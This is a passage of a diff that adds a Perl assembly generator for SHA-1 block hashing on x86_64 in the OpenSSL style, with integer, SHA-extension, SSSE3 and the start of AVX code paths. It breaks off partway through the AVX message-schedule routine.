+	mov	`4*$j`($inp),$xi[1]
+	mov	$d,$t0
+	mov	$xi[0],`4*$i`(%rsp)
+	mov	$a,$t2
+	bswap	$xi[1]
+	xor	$c,$t0
+	rol	\$5,$t2
+	and	$b,$t0
+	lea	0x5a827999($xi[0],$e),$e
+	add	$t2,$e
+	xor	$d,$t0
+	rol	\$30,$b
+	add	$t0,$e
+___
+$code.=<<___ if ($i>=15);
+	xor	`4*($j%16)`(%rsp),$xi[1]
+	mov	$d,$t0
+	mov	$xi[0],`4*($i%16)`(%rsp)
+	mov	$a,$t2
+	xor	`4*(($j+2)%16)`(%rsp),$xi[1]
+	xor	$c,$t0
+	rol	\$5,$t2
+	xor	`4*(($j+8)%16)`(%rsp),$xi[1]
+	and	$b,$t0
+	lea	0x5a827999($xi[0],$e),$e
+	rol	\$30,$b
+	xor	$d,$t0
+	add	$t2,$e
+	rol	\$1,$xi[1]
+	add	$t0,$e
+___
+push(@xi,shift(@xi));
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+my $K=($i<40)?0x6ed9eba1:0xca62c1d6;
+$code.=<<___ if ($i<79);
+	xor	`4*($j%16)`(%rsp),$xi[1]
+	mov	$b,$t0
+	`"mov	$xi[0],".4*($i%16)."(%rsp)"	if ($i<72)`
+	mov	$a,$t2
+	xor	`4*(($j+2)%16)`(%rsp),$xi[1]
+	xor	$d,$t0
+	rol	\$5,$t2
+	xor	`4*(($j+8)%16)`(%rsp),$xi[1]
+	lea	$K($xi[0],$e),$e
+	xor	$c,$t0
+	add	$t2,$e
+	rol	\$30,$b
+	add	$t0,$e
+	rol	\$1,$xi[1]
+___
+$code.=<<___ if ($i==79);
+	mov	$b,$t0
+	mov	$a,$t2
+	xor	$d,$t0
+	lea	$K($xi[0],$e),$e
+	rol	\$5,$t2
+	xor	$c,$t0
+	add	$t2,$e
+	rol	\$30,$b
+	add	$t0,$e
+___
+push(@xi,shift(@xi));
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___;
+	xor	`4*($j%16)`(%rsp),$xi[1]
+	mov	$d,$t0
+	mov	$xi[0],`4*($i%16)`(%rsp)
+	mov	$d,$t1
+	xor	`4*(($j+2)%16)`(%rsp),$xi[1]
+	and	$c,$t0
+	mov	$a,$t2
+	xor	`4*(($j+8)%16)`(%rsp),$xi[1]
+	lea	0x8f1bbcdc($xi[0],$e),$e
+	xor	$c,$t1
+	rol	\$5,$t2
+	add	$t0,$e
+	rol	\$1,$xi[1]
+	and	$b,$t1
+	add	$t2,$e
+	rol	\$30,$b
+	add	$t1,$e
+___
+push(@xi,shift(@xi));
+}
+
+$code.=<<___;
+.text
+.extern	OPENSSL_ia32cap_P
+
+.globl	sha1_block_data_order
+.type	sha1_block_data_order,\@function,3
+.align	16
+sha1_block_data_order:
+	mov	OPENSSL_ia32cap_P+0(%rip),%r9d
+	mov	OPENSSL_ia32cap_P+4(%rip),%r8d
+	mov	OPENSSL_ia32cap_P+8(%rip),%r10d
+	test	\$`1<<9`,%r8d		# check SSSE3 bit
+	jz	.Lialu
+___
+$code.=<<___ if ($shaext);
+	test	\$`1<<29`,%r10d		# check SHA bit	
+	jnz	_shaext_shortcut
+___
+$code.=<<___ if ($avx>1);
+	and	\$`1<<3|1<<5|1<<8`,%r10d	# check AVX2+BMI1+BMI2
+	cmp	\$`1<<3|1<<5|1<<8`,%r10d
+	je	_avx2_shortcut
+___
+$code.=<<___ if ($avx);
+	and	\$`1<<28`,%r8d		# mask AVX bit
+	and	\$`1<<30`,%r9d		# mask "Intel CPU" bit
+	or	%r9d,%r8d
+	cmp	\$`1<<28|1<<30`,%r8d
+	je	_avx_shortcut
+___
+$code.=<<___;
+	jmp	_ssse3_shortcut
+
+.align	16
+.Lialu:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	mov	%rdi,$ctx	# reassigned argument
+	sub	\$`8+16*4`,%rsp
+	mov	%rsi,$inp	# reassigned argument
+	and	\$-64,%rsp
+	mov	%rdx,$num	# reassigned argument
+	mov	%rax,`16*4`(%rsp)
+.Lprologue:
+
+	mov	0($ctx),$A
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	16($ctx),$E
+	jmp	.Lloop
+
+.align	16
+.Lloop:
+___
+for($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+for(;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+for(;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+for(;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	add	0($ctx),$A
+	add	4($ctx),$B
+	add	8($ctx),$C
+	add	12($ctx),$D
+	add	16($ctx),$E
+	mov	$A,0($ctx)
+	mov	$B,4($ctx)
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+
+	sub	\$1,$num
+	lea	`16*4`($inp),$inp
+	jnz	.Lloop
+
+	mov	`16*4`(%rsp),%rsi
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lepilogue:
+	ret
+.size	sha1_block_data_order,.-sha1_block_data_order
+___
+if ($shaext) {{{
+######################################################################
+# Intel SHA Extensions implementation of SHA1 update function.
+#
+my ($ctx,$inp,$num)=("%rdi","%rsi","%rdx");
+my ($ABCD,$E,$E_,$BSWAP,$ABCD_SAVE,$E_SAVE)=map("%xmm$_",(0..3,8,9));
+my @MSG=map("%xmm$_",(4..7));
+
+$code.=<<___;
+.type	sha1_block_data_order_shaext,\@function,3
+.align	32
+sha1_block_data_order_shaext:
+_shaext_shortcut:
+___
+$code.=<<___ if ($win64);
+	lea	`-8-4*16`(%rsp),%rsp
+	movaps	%xmm6,-8-4*16(%rax)
+	movaps	%xmm7,-8-3*16(%rax)
+	movaps	%xmm8,-8-2*16(%rax)
+	movaps	%xmm9,-8-1*16(%rax)
+.Lprologue_shaext:
+___
+$code.=<<___;
+	movdqu	($ctx),$ABCD
+	movd	16($ctx),$E
+	movdqa	K_XX_XX+0xa0(%rip),$BSWAP	# byte-n-word swap
+
+	movdqu	($inp),@MSG[0]
+	pshufd	\$0b00011011,$ABCD,$ABCD	# flip word order
+	movdqu	0x10($inp),@MSG[1]
+	pshufd	\$0b00011011,$E,$E		# flip word order
+	movdqu	0x20($inp),@MSG[2]
+	pshufb	$BSWAP,@MSG[0]
+	movdqu	0x30($inp),@MSG[3]
+	pshufb	$BSWAP,@MSG[1]
+	pshufb	$BSWAP,@MSG[2]
+	movdqa	$E,$E_SAVE			# offload $E
+	pshufb	$BSWAP,@MSG[3]
+	jmp	.Loop_shaext
+
+.align	16
+.Loop_shaext:
+	dec		$num
+	lea		0x40($inp),%rax		# next input block
+	paddd		@MSG[0],$E
+	cmovne		%rax,$inp
+	movdqa		$ABCD,$ABCD_SAVE	# offload $ABCD
+___
+for($i=0;$i<20-4;$i+=2) {
+$code.=<<___;
+	sha1msg1	@MSG[1],@MSG[0]
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$`int($i/5)`,$E,$ABCD	# 0-3...
+	sha1nexte	@MSG[1],$E_
+	pxor		@MSG[2],@MSG[0]
+	sha1msg1	@MSG[2],@MSG[1]
+	sha1msg2	@MSG[3],@MSG[0]
+
+	movdqa		$ABCD,$E
+	sha1rnds4	\$`int(($i+1)/5)`,$E_,$ABCD
+	sha1nexte	@MSG[2],$E
+	pxor		@MSG[3],@MSG[1]
+	sha1msg2	@MSG[0],@MSG[1]
+___
+	push(@MSG,shift(@MSG));	push(@MSG,shift(@MSG));
+}
+$code.=<<___;
+	movdqu		($inp),@MSG[0]
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$3,$E,$ABCD		# 64-67
+	sha1nexte	@MSG[1],$E_
+	movdqu		0x10($inp),@MSG[1]
+	pshufb		$BSWAP,@MSG[0]
+
+	movdqa		$ABCD,$E
+	sha1rnds4	\$3,$E_,$ABCD		# 68-71
+	sha1nexte	@MSG[2],$E
+	movdqu		0x20($inp),@MSG[2]
+	pshufb		$BSWAP,@MSG[1]
+
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$3,$E,$ABCD		# 72-75
+	sha1nexte	@MSG[3],$E_
+	movdqu		0x30($inp),@MSG[3]
+	pshufb		$BSWAP,@MSG[2]
+
+	movdqa		$ABCD,$E
+	sha1rnds4	\$3,$E_,$ABCD		# 76-79
+	sha1nexte	$E_SAVE,$E
+	pshufb		$BSWAP,@MSG[3]
+
+	paddd		$ABCD_SAVE,$ABCD
+	movdqa		$E,$E_SAVE		# offload $E
+
+	jnz		.Loop_shaext
+
+	pshufd	\$0b00011011,$ABCD,$ABCD
+	pshufd	\$0b00011011,$E,$E
+	movdqu	$ABCD,($ctx)
+	movd	$E,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	-8-4*16(%rax),%xmm6
+	movaps	-8-3*16(%rax),%xmm7
+	movaps	-8-2*16(%rax),%xmm8
+	movaps	-8-1*16(%rax),%xmm9
+	mov	%rax,%rsp
+.Lepilogue_shaext:
+___
+$code.=<<___;
+	ret
+.size	sha1_block_data_order_shaext,.-sha1_block_data_order_shaext
+___
+}}}
+{{{
+my $Xi=4;
+my @X=map("%xmm$_",(4..7,0..3));
+my @Tx=map("%xmm$_",(8..10));
+my $Kx="%xmm11";
+my @V=($A,$B,$C,$D,$E)=("%eax","%ebx","%ecx","%edx","%ebp");	# size optimization
+my @T=("%esi","%edi");
+my $j=0;
+my $rx=0;
+my $K_XX_XX="%r11";
+
+my $_rol=sub { &rol(@_) };
+my $_ror=sub { &ror(@_) };
+
+{ my $sn;
+sub align32() {
+  ++$sn;
+$code.=<<___;
+	jmp	.Lalign32_$sn	# see "Decoded ICache" in manual
+.align	32
+.Lalign32_$sn:
+___
+}
+}
+
+$code.=<<___;
+.type	sha1_block_data_order_ssse3,\@function,3
+.align	16
+sha1_block_data_order_ssse3:
+_ssse3_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13		# redundant, done to share Win64 SE handler
+	push	%r14
+	lea	`-64-($win64?6*16:0)`(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,-40-6*16(%rax)
+	movaps	%xmm7,-40-5*16(%rax)
+	movaps	%xmm8,-40-4*16(%rax)
+	movaps	%xmm9,-40-3*16(%rax)
+	movaps	%xmm10,-40-2*16(%rax)
+	movaps	%xmm11,-40-1*16(%rax)
+.Lprologue_ssse3:
+___
+$code.=<<___;
+	mov	%rax,%r14	# original %rsp
+	and	\$-64,%rsp
+	mov	%rdi,$ctx	# reassigned argument
+	mov	%rsi,$inp	# reassigned argument
+	mov	%rdx,$num	# reassigned argument
+
+	shl	\$6,$num
+	add	$inp,$num
+	lea	K_XX_XX+64(%rip),$K_XX_XX
+
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	movdqa	64($K_XX_XX),@X[2]	# pbswap mask
+	movdqa	-64($K_XX_XX),@Tx[1]	# K_00_19
+	movdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	movdqu	16($inp),@X[-3&7]
+	movdqu	32($inp),@X[-2&7]
+	movdqu	48($inp),@X[-1&7]
+	pshufb	@X[2],@X[-4&7]		# byte swap
+	pshufb	@X[2],@X[-3&7]
+	pshufb	@X[2],@X[-2&7]
+	add	\$64,$inp
+	paddd	@Tx[1],@X[-4&7]		# add K_00_19
+	pshufb	@X[2],@X[-1&7]
+	paddd	@Tx[1],@X[-3&7]
+	paddd	@Tx[1],@X[-2&7]
+	movdqa	@X[-4&7],0(%rsp)	# X[]+K xfer to IALU
+	psubd	@Tx[1],@X[-4&7]		# restore X[]
+	movdqa	@X[-3&7],16(%rsp)
+	psubd	@Tx[1],@X[-3&7]
+	movdqa	@X[-2&7],32(%rsp)
+	psubd	@Tx[1],@X[-2&7]
+	jmp	.Loop_ssse3
+___
+
+sub AUTOLOAD()		# thunk [simplified] 32-bit style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
+  my $arg = pop;
+    $arg = "\$$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
+}
+
+sub Xupdate_ssse3_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));		# ror
+	&pshufd	(@X[0],@X[-4&7],0xee);	# was &movdqa	(@X[0],@X[-3&7]);
+	 eval(shift(@insns));
+	&movdqa	(@Tx[0],@X[-1&7]);
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&punpcklqdq(@X[0],@X[-3&7]);	# compose "X[-14]" in "X[0]", was &palignr(@X[0],@X[-4&7],8);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	&psrldq	(@Tx[0],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&pxor	(@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&movdqa	(@Tx[2],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&movdqa	(@Tx[0],@X[0]);
+	 eval(shift(@insns));
+
+	&pslldq	(@Tx[2],12);		# "X[0]"<<96, extract one dword
+	&paddd	(@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@Tx[0],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	&movdqa	(@Tx[1],@Tx[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@Tx[2],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&por	(@X[0],@Tx[0]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pslld	(@Tx[1],2);
+	&pxor	(@X[0],@Tx[2]);
+	 eval(shift(@insns));
+	  &movdqa	(@Tx[2],eval(2*16*(($Xi)/5)-64)."($K_XX_XX)");	# K_XX_XX
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[1]);		# "X[0]"^=("X[0]">>96)<<<2
+	&pshufd (@Tx[1],@X[-1&7],0xee)	if ($Xi==7);	# was &movdqa	(@Tx[0],@X[-1&7]) in Xupdate_ssse3_32_79
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+		push(@Tx,shift(@Tx));
+}
+
+sub Xupdate_ssse3_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 44 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns))		if ($Xi==8);
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns))		if ($Xi==8);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns))		if (@insns[1] =~ /_ror/);
+	 eval(shift(@insns))		if (@insns[0] =~ /_ror/);
+	&punpcklqdq(@Tx[0],@X[-1&7]);	# compose "X[-6]", was &palignr(@Tx[0],@X[-2&7],8);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&pxor	(@X[0],@X[-7&7]);	# "X[0]"^="X[-28]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	if ($Xi%5) {
+	  &movdqa	(@Tx[2],@Tx[1]);# "perpetuate" K_XX_XX...
+	} else {			# ... or load next one
+	  &movdqa	(@Tx[2],eval(2*16*($Xi/5)-64)."($K_XX_XX)");
+	}
+	 eval(shift(@insns));		# ror
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[0]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns))		if (@insns[0] =~ /_ror/);
+
+	&movdqa	(@Tx[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# body_20_39
+
+	&pslld	(@X[0],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&psrld	(@Tx[0],30);
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+
+	&por	(@X[0],@Tx[0]);		# "X[0]"<<<=2
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns))		if (@insns[1] =~ /_rol/);
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);
+	  &pshufd(@Tx[1],@X[-1&7],0xee)	if ($Xi<19);	# was &movdqa	(@Tx[1],@X[0])
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+		push(@Tx,shift(@Tx));
+}
+
+sub Xuplast_ssse3_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&cmp	($inp,$num);
+	&je	(".Ldone_ssse3");
+
+	unshift(@Tx,pop(@Tx));
+
+	&movdqa	(@X[2],"64($K_XX_XX)");		# pbswap mask
+	&movdqa	(@Tx[1],"-64($K_XX_XX)");	# K_00_19
+	&movdqu	(@X[-4&7],"0($inp)");		# load input
+	&movdqu	(@X[-3&7],"16($inp)");
+	&movdqu	(@X[-2&7],"32($inp)");
+	&movdqu	(@X[-1&7],"48($inp)");
+	&pshufb	(@X[-4&7],@X[2]);		# byte swap
+	&add	($inp,64);
+
+  $Xi=0;
+}
+
+sub Xloop_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&pshufb	(@X[($Xi-3)&7],@X[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&paddd	(@X[($Xi-4)&7],@Tx[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&movdqa	(eval(16*$Xi)."(%rsp)",@X[($Xi-4)&7]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&psubd	(@X[($Xi-4)&7],@Tx[1]);
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+sub body_00_19 () {	# ((c^d)&b)^d
+	# on start @T[0]=(c^d)&b
+	return &body_20_39() if ($rx==19); $rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&$_ror	($b,$j?7:2)',	# $b>>>2
+	'&xor	(@T[0],$d)',
+	'&mov	(@T[1],$a)',	# $b for next round
+
+	'&add	($e,eval(4*($j&15))."(%rsp)")',	# X[]+K xfer
+	'&xor	($b,$c)',	# $c^$d for next round
+
+	'&$_rol	($a,5)',
+	'&add	($e,@T[0])',
+	'&and	(@T[1],$b)',	# ($b&($c^$d)) for next round
+
+	'&xor	($b,$c)',	# restore $b
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub body_20_39 () {	# b^d^c
+	# on entry @T[0]=b^d
+	return &body_40_59() if ($rx==39); $rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,eval(4*($j&15))."(%rsp)")',	# X[]+K xfer
+	'&xor	(@T[0],$d)	if($j==19);'.
+	'&xor	(@T[0],$c)	if($j> 19)',	# ($b^$d^$c)
+	'&mov	(@T[1],$a)',	# $b for next round
+
+	'&$_rol	($a,5)',
+	'&add	($e,@T[0])',
+	'&xor	(@T[1],$c)	if ($j< 79)',	# $b^$d for next round
+
+	'&$_ror	($b,7)',	# $b>>>2
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub body_40_59 () {	# ((b^c)&(c^d))^c
+	# on entry @T[0]=(b^c), (c^=d)
+	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,eval(4*($j&15))."(%rsp)")',	# X[]+K xfer
+	'&and	(@T[0],$c)	if ($j>=40)',	# (b^c)&(c^d)
+	'&xor	($c,$d)		if ($j>=40)',	# restore $c
+
+	'&$_ror	($b,7)',	# $b>>>2
+	'&mov	(@T[1],$a)',	# $b for next round
+	'&xor	(@T[0],$c)',
+
+	'&$_rol	($a,5)',
+	'&add	($e,@T[0])',
+	'&xor	(@T[1],$c)	if ($j==59);'.
+	'&xor	(@T[1],$b)	if ($j< 59)',	# b^c for next round
+
+	'&xor	($b,$c)		if ($j< 59)',	# c^d for next round
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+$code.=<<___;
+.align	16
+.Loop_ssse3:
+___
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xuplast_ssse3_80(\&body_20_39);	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+
+$code.=<<___;
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_ssse3
+
+.align	16
+.Ldone_ssse3:
+___
+				$j=$saved_j; @V=@saved_V;
+
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+
+$code.=<<___;
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	-40-6*16(%r14),%xmm6
+	movaps	-40-5*16(%r14),%xmm7
+	movaps	-40-4*16(%r14),%xmm8
+	movaps	-40-3*16(%r14),%xmm9
+	movaps	-40-2*16(%r14),%xmm10
+	movaps	-40-1*16(%r14),%xmm11
+___
+$code.=<<___;
+	lea	(%r14),%rsi
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lepilogue_ssse3:
+	ret
+.size	sha1_block_data_order_ssse3,.-sha1_block_data_order_ssse3
+___
+
+if ($avx) {
+$Xi=4;				# reset variables
+@X=map("%xmm$_",(4..7,0..3));
+@Tx=map("%xmm$_",(8..10));
+$j=0;
+$rx=0;
+
+my $done_avx_label=".Ldone_avx";
+
+my $_rol=sub { &shld(@_[0],@_) };
+my $_ror=sub { &shrd(@_[0],@_) };
+
+$code.=<<___;
+.type	sha1_block_data_order_avx,\@function,3
+.align	16
+sha1_block_data_order_avx:
+_avx_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13		# redundant, done to share Win64 SE handler
+	push	%r14
+	lea	`-64-($win64?6*16:0)`(%rsp),%rsp
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	vmovaps	%xmm6,-40-6*16(%rax)
+	vmovaps	%xmm7,-40-5*16(%rax)
+	vmovaps	%xmm8,-40-4*16(%rax)
+	vmovaps	%xmm9,-40-3*16(%rax)
+	vmovaps	%xmm10,-40-2*16(%rax)
+	vmovaps	%xmm11,-40-1*16(%rax)
+.Lprologue_avx:
+___
+$code.=<<___;
+	mov	%rax,%r14	# original %rsp
+	and	\$-64,%rsp
+	mov	%rdi,$ctx	# reassigned argument
+	mov	%rsi,$inp	# reassigned argument
+	mov	%rdx,$num	# reassigned argument
+
+	shl	\$6,$num
+	add	$inp,$num
+	lea	K_XX_XX+64(%rip),$K_XX_XX
+
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	vmovdqa	64($K_XX_XX),@X[2]	# pbswap mask
+	vmovdqa	-64($K_XX_XX),$Kx	# K_00_19
+	vmovdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	vmovdqu	16($inp),@X[-3&7]
+	vmovdqu	32($inp),@X[-2&7]
+	vmovdqu	48($inp),@X[-1&7]
+	vpshufb	@X[2],@X[-4&7],@X[-4&7]	# byte swap
+	add	\$64,$inp
+	vpshufb	@X[2],@X[-3&7],@X[-3&7]
+	vpshufb	@X[2],@X[-2&7],@X[-2&7]
+	vpshufb	@X[2],@X[-1&7],@X[-1&7]
+	vpaddd	$Kx,@X[-4&7],@X[0]	# add K_00_19
+	vpaddd	$Kx,@X[-3&7],@X[1]
+	vpaddd	$Kx,@X[-2&7],@X[2]
+	vmovdqa	@X[0],0(%rsp)		# X[]+K xfer to IALU
+	vmovdqa	@X[1],16(%rsp)
+	vmovdqa	@X[2],32(%rsp)
+	jmp	.Loop_avx
+___
+
+sub Xupdate_avx_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpalignr(@X[0],@X[-3&7],@X[-4&7],8);	# compose "X[-14]" in "X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpsrldq(@Tx[0],@X[-1&7],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
